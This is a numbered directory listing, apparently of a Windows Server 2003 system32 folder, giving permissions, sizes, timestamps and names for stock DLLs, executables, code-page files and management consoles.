  659. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1144.nls
  660. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1145.nls
  661. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1146.nls
  662. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1147.nls
  663. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1148.nls
  664. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1149.nls
  665. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1250.nls
  666. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1251.nls
  667. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1252.nls
  668. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1253.nls
  669. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1254.nls
  670. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1255.nls
  671. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1256.nls
  672. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1257.nls
  673. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_1258.nls
  674. 100666/rw-rw-rw- 189986 fil 2002-12-31 07:00:00 -0500 c_1361.nls
  675. 100666/rw-rw-rw- 180258 fil 2002-12-31 07:00:00 -0500 c_20000.nls
  676. 100666/rw-rw-rw- 186402 fil 2002-12-31 07:00:00 -0500 c_20001.nls
  677. 100666/rw-rw-rw- 173602 fil 2002-12-31 07:00:00 -0500 c_20002.nls
  678. 100666/rw-rw-rw- 185378 fil 2002-12-31 07:00:00 -0500 c_20003.nls
  679. 100666/rw-rw-rw- 180258 fil 2002-12-31 07:00:00 -0500 c_20004.nls
  680. 100666/rw-rw-rw- 187938 fil 2002-12-31 07:00:00 -0500 c_20005.nls
  681. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20105.nls
  682. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20106.nls
  683. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20107.nls
  684. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20108.nls
  685. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20127.nls
  686. 100666/rw-rw-rw- 139810 fil 2002-12-31 07:00:00 -0500 c_20261.nls
  687. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20269.nls
  688. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20273.nls
  689. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20277.nls
  690. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20278.nls
  691. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20280.nls
  692. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20284.nls
  693. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20285.nls
  694. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20290.nls
  695. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20297.nls
  696. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20420.nls
  697. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20423.nls
  698. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20424.nls
  699. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20833.nls
  700. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20838.nls
  701. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20866.nls
  702. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20871.nls
  703. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20880.nls
  704. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20905.nls
  705. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_20924.nls
  706. 100666/rw-rw-rw- 180770 fil 2002-12-31 07:00:00 -0500 c_20932.nls
  707. 100666/rw-rw-rw- 173602 fil 2002-12-31 07:00:00 -0500 c_20936.nls
  708. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_21025.nls
  709. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_21027.nls
  710. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_21866.nls
  711. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28591.nls
  712. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28592.nls
  713. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28593.nls
  714. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28594.nls
  715. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28595.nls
  716. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28596.nls
  717. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28597.nls
  718. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28598.nls
  719. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28599.nls
  720. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_28605.nls
  721. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_437.nls
  722. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_500.nls
  723. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_708.nls
  724. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_720.nls
  725. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_737.nls
  726. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_775.nls
  727. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_850.nls
  728. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_852.nls
  729. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_855.nls
  730. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_857.nls
  731. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_858.nls
  732. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_860.nls
  733. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_861.nls
  734. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_862.nls
  735. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_863.nls
  736. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_864.nls
  737. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_865.nls
  738. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_866.nls
  739. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_869.nls
  740. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_870.nls
  741. 100666/rw-rw-rw- 66594 fil 2002-12-31 07:00:00 -0500 c_874.nls
  742. 100666/rw-rw-rw- 66082 fil 2002-12-31 07:00:00 -0500 c_875.nls
  743. 100666/rw-rw-rw- 162850 fil 2002-12-31 07:00:00 -0500 c_932.nls
  744. 100666/rw-rw-rw- 196642 fil 2002-12-31 07:00:00 -0500 c_936.nls
  745. 100666/rw-rw-rw- 196642 fil 2002-12-31 07:00:00 -0500 c_949.nls
  746. 100666/rw-rw-rw- 196642 fil 2002-12-31 07:00:00 -0500 c_950.nls
  747. 100666/rw-rw-rw- 56080 fil 2002-12-31 07:00:00 -0500 cabinet.dll
  748. 100666/rw-rw-rw- 31504 fil 2002-12-31 07:00:00 -0500 cabview.dll
  749. 100777/rwxrwxrwx 17680 fil 2002-12-31 07:00:00 -0500 cacls.exe
  750. 100777/rwxrwxrwx 91408 fil 2002-12-31 07:00:00 -0500 calc.exe
  751. 100666/rw-rw-rw- 127760 fil 2002-12-31 07:00:00 -0500 capesnpn.dll
  752. 100666/rw-rw-rw- 153360 fil 2002-12-31 07:00:00 -0500 cards.dll
  753. 100666/rw-rw-rw- 166160 fil 2002-12-31 07:00:00 -0500 catsrv.dll
  754. 100666/rw-rw-rw- 55056 fil 2002-12-31 07:00:00 -0500 catsrvps.dll
  755. 100666/rw-rw-rw- 591120 fil 2002-12-31 07:00:00 -0500 catsrvut.dll
  756. 100666/rw-rw-rw- 49936 fil 2002-12-31 07:00:00 -0500 ccfapi32.dll
  757. 100666/rw-rw-rw- 34064 fil 2002-12-31 07:00:00 -0500 ccfgnt.dll
  758. 100666/rw-rw-rw- 142608 fil 2002-12-31 07:00:00 -0500 cdfview.dll
  759. 100666/rw-rw-rw- 18432 fil 2002-12-31 07:00:00 -0500 cdm.dll
  760. 100666/rw-rw-rw- 16656 fil 2002-12-31 07:00:00 -0500 cdmodem.dll
  761. 100666/rw-rw-rw- 402704 fil 2002-12-31 07:00:00 -0500 cdonts.dll
  762. 100666/rw-rw-rw- 2531088 fil 2002-12-31 07:00:00 -0500 cdosys.dll
  763. 100777/rwxrwxrwx 337680 fil 2002-12-31 07:00:00 -0500 cdplayer.exe
  764. 100666/rw-rw-rw- 54544 fil 2002-12-31 07:00:00 -0500 certadm.dll
  765. 100666/rw-rw-rw- 135440 fil 2002-12-31 07:00:00 -0500 certcli.dll
  766. 100666/rw-rw-rw- 422160 fil 2002-12-31 07:00:00 -0500 certmgr.dll
  767. 100666/rw-rw-rw- 48640 fil 2002-12-31 07:00:00 -0500 certmgr.msc
  768. 40777/rwxrwxrwx 0 dir 2017-05-25 06:18:02 -0400 certsrv
  769. 100666/rw-rw-rw- 27920 fil 2002-12-31 07:00:00 -0500 cfgbkend.dll
  770. 100666/rw-rw-rw- 17168 fil 2002-12-31 07:00:00 -0500 cfgmgr32.dll
  771. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 change.exe
  772. 100777/rwxrwxrwx 90384 fil 2002-12-31 07:00:00 -0500 charmap.exe
  773. 100777/rwxrwxrwx 8464 fil 2002-12-31 07:00:00 -0500 chcp.com
  774. 100777/rwxrwxrwx 13584 fil 2002-12-31 07:00:00 -0500 chglogon.exe
  775. 100777/rwxrwxrwx 16656 fil 2002-12-31 07:00:00 -0500 chgport.exe
  776. 100777/rwxrwxrwx 15120 fil 2002-12-31 07:00:00 -0500 chgusr.exe
  777. 100777/rwxrwxrwx 13584 fil 2002-12-31 07:00:00 -0500 chkdsk.exe
  778. 100777/rwxrwxrwx 13072 fil 2002-12-31 07:00:00 -0500 chkntfs.exe
  779. 100666/rw-rw-rw- 156944 fil 2002-12-31 07:00:00 -0500 ciadmin.dll
  780. 100666/rw-rw-rw- 53248 fil 2002-12-31 07:00:00 -0500 ciadv.msc
  781. 100666/rw-rw-rw- 101648 fil 2002-12-31 07:00:00 -0500 cic.dll
  782. 100777/rwxrwxrwx 9488 fil 2002-12-31 07:00:00 -0500 cidaemon.exe
  783. 100666/rw-rw-rw- 68368 fil 2002-12-31 07:00:00 -0500 ciodm.dll
  784. 100777/rwxrwxrwx 36112 fil 2002-12-31 07:00:00 -0500 cipher.exe
  785. 100777/rwxrwxrwx 5392 fil 2002-12-31 07:00:00 -0500 cisvc.exe
  786. 100777/rwxrwxrwx 9488 fil 2002-12-31 07:00:00 -0500 ckcnv.exe
  787. 100666/rw-rw-rw- 11024 fil 2002-12-31 07:00:00 -0500 clb.dll
  788. 100666/rw-rw-rw- 96016 fil 2002-12-31 07:00:00 -0500 clbcatex.dll
  789. 100666/rw-rw-rw- 510224 fil 2002-12-31 07:00:00 -0500 clbcatq.dll
  790. 100777/rwxrwxrwx 42256 fil 2002-12-31 07:00:00 -0500 cleanmgr.exe
  791. 100666/rw-rw-rw- 32435 fil 2002-12-31 07:00:00 -0500 cliconf.hlp
  792. 100666/rw-rw-rw- 61712 fil 2002-12-31 07:00:00 -0500 cliconfg.dll
  793. 100777/rwxrwxrwx 37136 fil 2002-12-31 07:00:00 -0500 cliconfg.exe
  794. 40777/rwxrwxrwx 0 dir 2017-05-25 06:10:15 -0400 clients
  795. 100777/rwxrwxrwx 99600 fil 2002-12-31 07:00:00 -0500 clipbrd.exe
  796. 100777/rwxrwxrwx 31504 fil 2002-12-31 07:00:00 -0500 clipsrv.exe
  797. 100666/rw-rw-rw- 55568 fil 2002-12-31 07:00:00 -0500 clusapi.dll
  798. 100777/rwxrwxrwx 130832 fil 2002-12-31 07:00:00 -0500 cluster.exe
  799. 100666/rw-rw-rw- 35600 fil 2002-12-31 07:00:00 -0500 cmcfg32.dll
  800. 100777/rwxrwxrwx 236304 fil 2002-12-31 07:00:00 -0500 cmd.exe
  801. 100666/rw-rw-rw- 193808 fil 2002-12-31 07:00:00 -0500 cmdial32.dll
  802. 100777/rwxrwxrwx 38672 fil 2002-12-31 07:00:00 -0500 cmdl32.exe
  803. 100777/rwxrwxrwx 11536 fil 2002-12-31 07:00:00 -0500 cmmgr32.exe
  804. 100666/rw-rw-rw- 45387 fil 2002-12-31 07:00:00 -0500 cmmgr32.hlp
  805. 100777/rwxrwxrwx 34064 fil 2002-12-31 07:00:00 -0500 cmmon32.exe
  806. 100666/rw-rw-rw- 82704 fil 2002-12-31 07:00:00 -0500 cmnquery.dll
  807. 100666/rw-rw-rw- 64 fil 2002-12-31 07:00:00 -0500 cmos.ram
  808. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 cmpbk32.dll
  809. 100666/rw-rw-rw- 159807 fil 2002-12-31 07:00:00 -0500 cmprops.dll
  810. 100777/rwxrwxrwx 45328 fil 2002-12-31 07:00:00 -0500 cmstp.exe
  811. 100666/rw-rw-rw- 22288 fil 2002-12-31 07:00:00 -0500 cmutil.dll
  812. 100666/rw-rw-rw- 44816 fil 2002-12-31 07:00:00 -0500 cnbjmon.dll
  813. 100666/rw-rw-rw- 138000 fil 2002-12-31 07:00:00 -0500 cnetcfg.dll
  814. 100666/rw-rw-rw- 26384 fil 2002-12-31 07:00:00 -0500 cnvfat.dll
  815. 100666/rw-rw-rw- 37648 fil 2002-12-31 07:00:00 -0500 colbact.dll
  816. 100666/rw-rw-rw- 29968 fil 2002-12-31 07:00:00 -0500 comaddin.dll
  817. 100666/rw-rw-rw- 3856 fil 2002-12-31 07:00:00 -0500 comcat.dll
  818. 100777/rwxrwxrwx 21264 fil 2002-12-31 07:00:00 -0500 comclust.exe
  819. 100666/rw-rw-rw- 550672 fil 2002-12-31 07:00:00 -0500 comctl32.dll
  820. 100666/rw-rw-rw- 241424 fil 2002-12-31 07:00:00 -0500 comdlg32.dll
  821. 100666/rw-rw-rw- 10544 fil 2002-12-31 07:00:00 -0500 comm.drv
  822. 100777/rwxrwxrwx 50620 fil 2002-12-31 07:00:00 -0500 command.com
  823. 100666/rw-rw-rw- 28288 fil 2002-12-31 07:00:00 -0500 commdlg.dll
  824. 100777/rwxrwxrwx 16144 fil 2002-12-31 07:00:00 -0500 comp.exe
  825. 100777/rwxrwxrwx 18192 fil 2002-12-31 07:00:00 -0500 compact.exe
  826. 100666/rw-rw-rw- 65536 fil 2002-12-31 07:00:00 -0500 compmgmt.msc
  827. 100666/rw-rw-rw- 30160 fil 2002-12-31 07:00:00 -0500 compobj.dll
  828. 100666/rw-rw-rw- 217360 fil 2002-12-31 07:00:00 -0500 compstui.dll
  829. 100666/rw-rw-rw- 89360 fil 2002-12-31 07:00:00 -0500 comrepl.dll
  830. 100666/rw-rw-rw- 146192 fil 2002-12-31 07:00:00 -0500 comsnap.dll
  831. 100666/rw-rw-rw- 1448208 fil 2002-12-31 07:00:00 -0500 comsvcs.dll
  832. 100666/rw-rw-rw- 625936 fil 2002-12-31 07:00:00 -0500 comuid.dll
  833. 40777/rwxrwxrwx 0 dir 2017-05-25 06:19:36 -0400 config
  834. 100666/rw-rw-rw- 219920 fil 2002-12-31 07:00:00 -0500 confmsp.dll
  835. 100777/rwxrwxrwx 25872 fil 2002-12-31 07:00:00 -0500 conime.exe
  836. 100666/rw-rw-rw- 43280 fil 2002-12-31 07:00:00 -0500 console.dll
  837. 100777/rwxrwxrwx 7440 fil 2002-12-31 07:00:00 -0500 control.exe
  838. 100777/rwxrwxrwx 14096 fil 2002-12-31 07:00:00 -0500 convert.exe
  839. 100777/rwxrwxrwx 67856 fil 2002-12-31 07:00:00 -0500 convlog.exe
  840. 100666/rw-rw-rw- 12048 fil 2002-12-31 07:00:00 -0500 convmsg.dll
  841. 100666/rw-rw-rw- 14608 fil 2002-12-31 07:00:00 -0500 corpol.dll
  842. 100666/rw-rw-rw- 27097 fil 2002-12-31 07:00:00 -0500 country.sys
  843. 100777/rwxrwxrwx 19728 fil 2002-12-31 07:00:00 -0500 cprofile.exe
  844. 100666/rw-rw-rw- 149264 fil 2002-12-31 07:00:00 -0500 crtdll.dll
  845. 100666/rw-rw-rw- 479504 fil 2002-12-31 07:00:00 -0500 crypt32.dll
  846. 100666/rw-rw-rw- 90384 fil 2002-12-31 07:00:00 -0500 cryptdlg.dll
  847. 100666/rw-rw-rw- 44304 fil 2002-12-31 07:00:00 -0500 cryptdll.dll
  848. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 cryptext.dll
  849. 100666/rw-rw-rw- 43280 fil 2002-12-31 07:00:00 -0500 cryptnet.dll
  850. 100666/rw-rw-rw- 76048 fil 2002-12-31 07:00:00 -0500 cryptsvc.dll
  851. 100666/rw-rw-rw- 443664 fil 2002-12-31 07:00:00 -0500 cryptui.dll
  852. 100666/rw-rw-rw- 101136 fil 2002-12-31 07:00:00 -0500 cscdll.dll
  853. 100777/rwxrwxrwx 86066 fil 2002-12-31 07:00:00 -0500 cscript.exe
  854. 100666/rw-rw-rw- 242960 fil 2002-12-31 07:00:00 -0500 cscui.dll
  855. 100666/rw-rw-rw- 35088 fil 2002-12-31 07:00:00 -0500 csrsrv.dll
  856. 100777/rwxrwxrwx 5392 fil 2002-12-31 07:00:00 -0500 csrss.exe
  857. 100777/rwxrwxrwx 40208 fil 2002-12-31 07:00:00 -0500 csvde.exe
  858. 100666/rw-rw-rw- 27136 fil 2002-12-31 07:00:00 -0500 ctl3d32.dll
  859. 100666/rw-rw-rw- 27200 fil 2002-12-31 07:00:00 -0500 ctl3dv2.dll
  860. 100666/rw-rw-rw- 7070 fil 2002-12-31 07:00:00 -0500 ctype.nls
  861. 100666/rw-rw-rw- 446224 fil 2002-12-31 07:00:00 -0500 d3dim.dll
  862. 100666/rw-rw-rw- 584976 fil 2002-12-31 07:00:00 -0500 d3dim700.dll
  863. 100666/rw-rw-rw- 37648 fil 2002-12-31 07:00:00 -0500 d3dpmesh.dll
  864. 100666/rw-rw-rw- 591120 fil 2002-12-31 07:00:00 -0500 d3dramp.dll
  865. 100666/rw-rw-rw- 93456 fil 2002-12-31 07:00:00 -0500 d3dref.dll
  866. 100666/rw-rw-rw- 364816 fil 2002-12-31 07:00:00 -0500 d3drm.dll
  867. 100666/rw-rw-rw- 49424 fil 2002-12-31 07:00:00 -0500 d3dxof.dll
  868. 100666/rw-rw-rw- 1133840 fil 2002-12-31 07:00:00 -0500 danim.dll
  869. 100666/rw-rw-rw- 40208 fil 2002-12-31 07:00:00 -0500 dataclen.dll
  870. 100666/rw-rw-rw- 157968 fil 2002-12-31 07:00:00 -0500 datime.dll
  871. 100666/rw-rw-rw- 147216 fil 2002-12-31 07:00:00 -0500 daxctle.ocx
  872. 100666/rw-rw-rw- 163088 fil 2002-12-31 07:00:00 -0500 dbghelp.dll
  873. 100777/rwxrwxrwx 15632 fil 2002-12-31 07:00:00 -0500 dbgtrace.exe
  874. 100666/rw-rw-rw- 33040 fil 2002-12-31 07:00:00 -0500 dbmsadsn.dll
  875. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 dbmsrpcn.dll
  876. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 dbmssocn.dll
  877. 100666/rw-rw-rw- 33040 fil 2002-12-31 07:00:00 -0500 dbmsspxn.dll
  878. 100666/rw-rw-rw- 28944 fil 2002-12-31 07:00:00 -0500 dbmsvinn.dLL
  879. 100666/rw-rw-rw- 33040 fil 2002-12-31 07:00:00 -0500 dbnmpntw.dll
  880. 100666/rw-rw-rw- 8464 fil 2002-12-31 07:00:00 -0500 dciman32.dll
  881. 100777/rwxrwxrwx 113936 fil 2002-12-31 07:00:00 -0500 dcomcnfg.exe
  882. 100777/rwxrwxrwx 40720 fil 2002-12-31 07:00:00 -0500 dcphelp.exe
  883. 100666/rw-rw-rw- 58880 fil 2002-12-31 07:00:00 -0500 dcpol.msc
  884. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 dcpromo.dll
  885. 100777/rwxrwxrwx 623888 fil 2002-12-31 07:00:00 -0500 dcpromo.exe
  886. 100666/rw-rw-rw- 39936 fil 2002-12-31 07:00:00 -0500 ddeml.dll
  887. 100777/rwxrwxrwx 27920 fil 2002-12-31 07:00:00 -0500 ddeshare.exe
  888. 100777/rwxrwxrwx 5904 fil 2002-12-31 07:00:00 -0500 ddmprxy.exe
  889. 100666/rw-rw-rw- 266512 fil 2002-12-31 07:00:00 -0500 ddraw.dll
  890. 100666/rw-rw-rw- 24336 fil 2002-12-31 07:00:00 -0500 ddrawex.dll
  891. 100777/rwxrwxrwx 20634 fil 2002-12-31 07:00:00 -0500 debug.exe
  892. 100666/rw-rw-rw- 237328 fil 2002-12-31 07:00:00 -0500 desk.cpl
  893. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 deskadp.dll
  894. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 deskmon.dll
  895. 100666/rw-rw-rw- 14096 fil 2002-12-31 07:00:00 -0500 deskperf.dll
  896. 100666/rw-rw-rw- 271 fil 2017-05-25 06:14:34 -0400 desktop.ini
  897. 100666/rw-rw-rw- 48912 fil 2002-12-31 07:00:00 -0500 devenum.dll
  898. 100666/rw-rw-rw- 45056 fil 2002-12-31 07:00:00 -0500 devmgmt.msc
  899. 100666/rw-rw-rw- 221968 fil 2002-12-31 07:00:00 -0500 devmgr.dll
  900. 100666/rw-rw-rw- 98304 fil 2002-12-31 07:00:00 -0500 dfrg.msc
  901. 100777/rwxrwxrwx 62224 fil 2002-12-31 07:00:00 -0500 dfrgfat.exe
  902. 100777/rwxrwxrwx 76048 fil 2002-12-31 07:00:00 -0500 dfrgntfs.exe
  903. 100666/rw-rw-rw- 28160 fil 2002-12-31 07:00:00 -0500 dfrgres.dll
  904. 100666/rw-rw-rw- 42768 fil 2002-12-31 07:00:00 -0500 dfrgsnap.dll
  905. 100666/rw-rw-rw- 109328 fil 2002-12-31 07:00:00 -0500 dfrgui.dll
  906. 100777/rwxrwxrwx 14096 fil 2002-12-31 07:00:00 -0500 dfscmd.exe
  907. 100666/rw-rw-rw- 51984 fil 2002-12-31 07:00:00 -0500 dfscore.dll
  908. 100666/rw-rw-rw- 240912 fil 2002-12-31 07:00:00 -0500 dfsgui.dll
  909. 100666/rw-rw-rw- 49664 fil 2002-12-31 07:00:00 -0500 dfsgui.msc
  910. 100777/rwxrwxrwx 4880 fil 2002-12-31 07:00:00 -0500 dfsinit.exe
  911. 100666/rw-rw-rw- 105232 fil 2002-12-31 07:00:00 -0500 dfssetup.dll
  912. 100666/rw-rw-rw- 22800 fil 2002-12-31 07:00:00 -0500 dfsshlex.dll
  913. 100777/rwxrwxrwx 90896 fil 2002-12-31 07:00:00 -0500 dfssvc.exe
  914. 100666/rw-rw-rw- 123904 fil 2002-12-31 07:00:00 -0500 dgrpsetu.dll
  915. 100666/rw-rw-rw- 85264 fil 2002-12-31 07:00:00 -0500 dgsetup.dll
  916. 40777/rwxrwxrwx 0 dir 2018-11-26 03:42:51 -0500 dhcp
  917. 100666/rw-rw-rw- 92944 fil 2002-12-31 07:00:00 -0500 dhcpcsvc.dll
  918. 100666/rw-rw-rw- 1997 fil 1998-10-20 22:10:38 -0400 dhcpctrs.h
  919. 100666/rw-rw-rw- 2360 fil 1999-05-12 21:20:42 -0400 dhcpctrs.ini
  920. 100666/rw-rw-rw- 54272 fil 1999-06-04 04:26:20 -0400 dhcpmgmt.msc
  921. 100666/rw-rw-rw- 8976 fil 1999-12-01 01:38:52 -0500 dhcpmib.dll
  922. 100666/rw-rw-rw- 306448 fil 2002-12-31 07:00:00 -0500 dhcpmon.dll
  923. 100666/rw-rw-rw- 75536 fil 2002-12-31 07:00:00 -0500 dhcpsapi.dll
  924. 100666/rw-rw-rw- 933648 fil 2003-06-19 15:05:04 -0400 dhcpsnap.dll
  925. 100666/rw-rw-rw- 235280 fil 2003-06-19 15:05:04 -0400 dhcpssvc.dll
  926. 100777/rwxrwxrwx 81168 fil 2002-12-31 07:00:00 -0500 diantz.exe
  927. 100666/rw-rw-rw- 46352 fil 2002-12-31 07:00:00 -0500 digest.dll
  928. 100666/rw-rw-rw- 134416 fil 2002-12-31 07:00:00 -0500 dinput.dll
  929. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 diskcomp.com
  930. 100777/rwxrwxrwx 8464 fil 2002-12-31 07:00:00 -0500 diskcopy.com
  931. 100666/rw-rw-rw- 16144 fil 2002-12-31 07:00:00 -0500 diskcopy.dll
  932. 100666/rw-rw-rw- 31232 fil 2002-12-31 07:00:00 -0500 diskmgmt.msc
  933. 100777/rwxrwxrwx 14096 fil 2002-12-31 07:00:00 -0500 diskperf.exe
  934. 100666/rw-rw-rw- 45112 fil 2002-12-31 07:00:00 -0500 dispex.dll
  935. 100666/rw-rw-rw- 10512 fil 2002-12-31 07:00:00 -0500 dlcapi.dll
  936. 40555/r-xr-xr-x 0 dir 2017-05-25 06:31:49 -0400 dllcache
  937. 100777/rwxrwxrwx 5904 fil 2002-12-31 07:00:00 -0500 dllhost.exe
  938. 100777/rwxrwxrwx 5904 fil 2002-12-31 07:00:00 -0500 dllhst3g.exe
  939. 100777/rwxrwxrwx 147728 fil 2002-12-31 07:00:00 -0500 dmadmin.exe
  940. 100666/rw-rw-rw- 26896 fil 2002-12-31 07:00:00 -0500 dmband.dll
  941. 100666/rw-rw-rw- 49936 fil 2002-12-31 07:00:00 -0500 dmcompos.dll
  942. 100666/rw-rw-rw- 316176 fil 2002-12-31 07:00:00 -0500 dmconfig.dll
  943. 100666/rw-rw-rw- 174864 fil 2002-12-31 07:00:00 -0500 dmdlgs.dll
  944. 100666/rw-rw-rw- 163600 fil 2002-12-31 07:00:00 -0500 dmdskmgr.dll
  945. 100666/rw-rw-rw- 122368 fil 2002-12-31 07:00:00 -0500 dmdskres.dll
  946. 100666/rw-rw-rw- 82704 fil 2002-12-31 07:00:00 -0500 dmime.dll
  947. 100666/rw-rw-rw- 13072 fil 2002-12-31 07:00:00 -0500 dmintf.dll
  948. 100666/rw-rw-rw- 21264 fil 2002-12-31 07:00:00 -0500 dmloader.dll
  949. 100666/rw-rw-rw- 23824 fil 2002-12-31 07:00:00 -0500 dmocx.dll
  950. 100777/rwxrwxrwx 10512 fil 2002-12-31 07:00:00 -0500 dmremote.exe
  951. 100666/rw-rw-rw- 12048 fil 2002-12-31 07:00:00 -0500 dmserver.dll
  952. 100666/rw-rw-rw- 78608 fil 2002-12-31 07:00:00 -0500 dmstyle.dll
  953. 100666/rw-rw-rw- 53008 fil 2002-12-31 07:00:00 -0500 dmsynth.dll
  954. 100666/rw-rw-rw- 68880 fil 2002-12-31 07:00:00 -0500 dmusic.dll
  955. 100666/rw-rw-rw- 43280 fil 2002-12-31 07:00:00 -0500 dmutil.dll
  956. 100666/rw-rw-rw- 61712 fil 2002-12-31 07:00:00 -0500 dmview.ocx
  957. 40777/rwxrwxrwx 0 dir 2018-11-21 02:42:04 -0500 dns
  958. 100777/rwxrwxrwx 326416 fil 2002-12-31 07:00:00 -0500 dns.exe
  959. 100666/rw-rw-rw- 134928 fil 2002-12-31 07:00:00 -0500 dnsapi.dll
  960. 100666/rw-rw-rw- 47616 fil 2002-12-31 07:00:00 -0500 dnsmgmt.msc
  961. 100666/rw-rw-rw- 700688 fil 2002-12-31 07:00:00 -0500 dnsmgr.dll
  962. 100666/rw-rw-rw- 33552 fil 2002-12-31 07:00:00 -0500 dnsperf.dll
  963. 100666/rw-rw-rw- 6536 fil 2002-12-31 07:00:00 -0500 dnsperf.h
  964. 100666/rw-rw-rw- 11400 fil 2002-12-31 07:00:00 -0500 dnsperf.ini
  965. 100666/rw-rw-rw- 92432 fil 2002-12-31 07:00:00 -0500 dnsrslvr.dll
  966. 100666/rw-rw-rw- 43280 fil 2002-12-31 07:00:00 -0500 docprop.dll
  967. 100666/rw-rw-rw- 304912 fil 2002-12-31 07:00:00 -0500 docprop2.dll
  968. 100666/rw-rw-rw- 76048 fil 2002-12-31 07:00:00 -0500 domadmin.dll
  969. 100666/rw-rw-rw- 38400 fil 2002-12-31 07:00:00 -0500 domain.msc
